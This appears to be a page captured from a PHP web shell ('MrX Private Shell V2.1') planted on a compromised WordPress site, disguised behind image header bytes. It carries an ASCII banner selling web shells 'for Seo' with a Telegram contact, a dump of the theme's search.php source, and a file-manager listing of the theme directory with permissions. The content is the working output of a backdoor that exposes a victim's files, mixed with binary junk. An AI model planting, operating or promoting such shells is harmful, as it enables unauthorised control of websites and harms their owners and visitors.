����JFIF���������
__ __ __ __ _____ _ _ _____ _ _ _ | \/ | \ \ / / | __ \ (_) | | / ____| | | | | | \ / |_ __\ V / | |__) | __ ___ ____ _| |_ ___ | (___ | |__ ___| | | | |\/| | '__|> < | ___/ '__| \ \ / / _` | __/ _ \ \___ \| '_ \ / _ \ | | | | | | |_ / . \ | | | | | |\ V / (_| | || __/ ____) | | | | __/ | | |_| |_|_(_)_/ \_\ |_| |_| |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1 if you need WebShell for Seo everyday contact me on Telegram Telegram Address : @jackleetFor_More_Tools:
<?php
/**
* the template for displaying search result
*/
get_header();
get_template_part( 'template-parts/banner/content', 'banner-blog' );
$blog_sidebar = buildbench_option('blog_sidebar',3);
$column = ($blog_sidebar == 1 || !is_active_sidebar('sidebar-1')) ? 'col-lg-8 mx-auto' : 'col-lg-8 col-md-12';
?>
<section id="main-content" class="blog main-container" role="main">
<div class="container">
<div class="row">
<?php if($blog_sidebar == 2){
get_sidebar();
} ?>
<div class="<?php echo esc_attr($column);?>">
<?php if ( have_posts() ) : ?>
<div class="xs-page-header">
<h2>
<?php printf(esc_html__('Search Results for: %s', 'buildbench'), get_search_query()); ?>
</h2>
<?php
// show author bio if exists
if (get_the_author_meta('description')) {
echo '<p>' . the_author_meta('description') . '</p>';
}
?>
</div>
<?php while ( have_posts() ) : the_post(); ?>
<?php get_template_part( 'template-parts/blog/contents/content', get_post_format() ); ?>
<?php endwhile; ?>
<?php get_template_part( 'template-parts/blog/paginations/pagination', 'style1' ); ?>
<?php else : ?>
<?php get_template_part( 'template-parts/blog/contents/content', 'none' ); ?>
<?php endif; ?>
</div><!-- .col-md-8 -->
<?php if($blog_sidebar == 3){
get_sidebar();
} ?>
</div><!-- .row -->
</div><!-- .container -->
</section><!-- #main-content -->
<?php get_footer(); ?>| Name | Type | Size | Permission | Actions |
|---|---|---|---|---|
| assets | Folder | 0755 |
|
|
| components | Folder | 0755 |
|
|
| core | Folder | 0755 |
|
|
| languages | Folder | 0755 |
|
|
| template | Folder | 0755 |
|
|
| template-parts | Folder | 0755 |
|
|
| 404.php | File | 1.28 KB | 0644 |
|
| README.html | File | 181 B | 0644 |
|
| README.md | File | 13 B | 0644 |
|
| archive.php | File | 1.14 KB | 0644 |
|
| author.php | File | 1.14 KB | 0644 |
|
| category.php | File | 1.34 KB | 0644 |
|
| comments.php | File | 5.72 KB | 0644 |
|
| footer.php | File | 597 B | 0644 |
|
| functions.php | File | 5.37 KB | 0644 |
|
| header.php | File | 1.62 KB | 0644 |
|
| index.php | File | 1.12 KB | 0644 |
|
| page.php | File | 1.38 KB | 0644 |
|
| readme.txt | File | 366 B | 0644 |
|
| screenshot.png | File | 311.94 KB | 0644 |
|
| search.php | File | 1.63 KB | 0644 |
|
| sidebar-woo.php | File | 148 B | 0644 |
|
| sidebar.php | File | 318 B | 0644 |
|
| single.php | File | 987 B | 0644 |
|
| style.css | File | 367 B | 0644 |
|
| tag.php | File | 1.13 KB | 0644 |
|
| woocommerce.php | File | 769 B | 0644 |
|
| wpml-config.xml | File | 243 B | 0644 |
|